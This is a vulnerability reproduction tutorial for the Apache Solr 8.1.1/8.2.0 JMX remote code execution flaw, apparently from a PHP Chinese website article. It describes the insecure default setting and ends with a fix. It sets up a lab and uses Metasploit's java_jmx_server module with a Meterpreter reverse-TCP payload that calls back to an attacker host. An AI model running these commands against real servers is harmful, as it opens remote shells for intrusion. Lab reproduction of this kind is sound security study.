How to reproduce the RCE vulnerability in Apache Solr JMX service

0x00Introduction

Solr is an independent enterprise-level search application server that provides an API interface similar to Web-service. Users can submit XML files in a certain format to the search engine server through http requests to generate indexes; they can also make search requests through Http Get operations and get returned results in XML format.

This vulnerability stems from the security risk in the ENABLE_REMOTE_JMX_OPTS configuration option in the default configuration file solr.in.sh.

The ENABLE_REMOTE_JMX_OPTS="true" option exists in the built-in configuration file solr.in.sh of versions 8.1.1 and 8.2.0 of Apache Solr.

If you use the default solr.in.sh file from the affected version, then JMX monitoring will be enabled and exposed on RMI_PORT (default = 18983),

and no need to do anything Authentication. If this port is opened for inbound traffic in the firewall, anyone with network access to the Solr node will be able to access JMX and

can upload malicious code to be executed on the Solr server. This vulnerability does not affect users of Windows systems, but only affects users of some versions of Linux.

0x01 affected version

Apache Solr8.1.1 version online time: 2019-05-28

Apache Solr8.2.0 version online time: 2019- 07-25

0x02 vulnerability hazards

If the victim uses this default configuration, the JMX service will be opened on the default port 18983, and authentication will not be enabled by default. Any attacker with access to this port could exploit this vulnerability to launch an attack on the affected service and execute arbitrary code.

0x03 environment construction

Java environment and kali system, Solr 8.20

Solr 8.20 download address:

wget http:/ /archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.zip

##Use unzip solr-8.2.0.zip to decompress

After decompression is completed, switch to the bin directory to start Solr

./solr start -force

Access after startup: http://192.168.10.176:8983/

##0x04 vulnerability recurrence

Attacking machine: kali IP: 192.168.10.147

Victim machine: docker IP in Ubuntu18.6: 192.168.10.184:8983

1. Use nmap to scan the port and find that port 18983 is open

2. Use exploit/multi/misc/java_jmx_server module in Metasploit to reproduce the vulnerability

Ø use exploit/multi/misc/java_jmx_server

Ø set RHOST 192.168.10.184

Ø set RPORT 18983

Set payload: java/meterpreter/reverse_tcp

Ø set payload java/meterpreter/ reverse_tcp

Ø set LHOST 192.168.10.147

Ø set LPORT 4444

##3. Use run to execute and you will see the successful establishment Connection

0x05 Fix suggestion

Set the ENABLE_REMOTE_JMX_OPTS option in the solr.in.sh configuration file to false and restart Solr Serve.

The above is the detailed content of How to reproduce the RCE vulnerability in Apache Solr JMX service. For more information, please follow other related articles on the PHP Chinese website!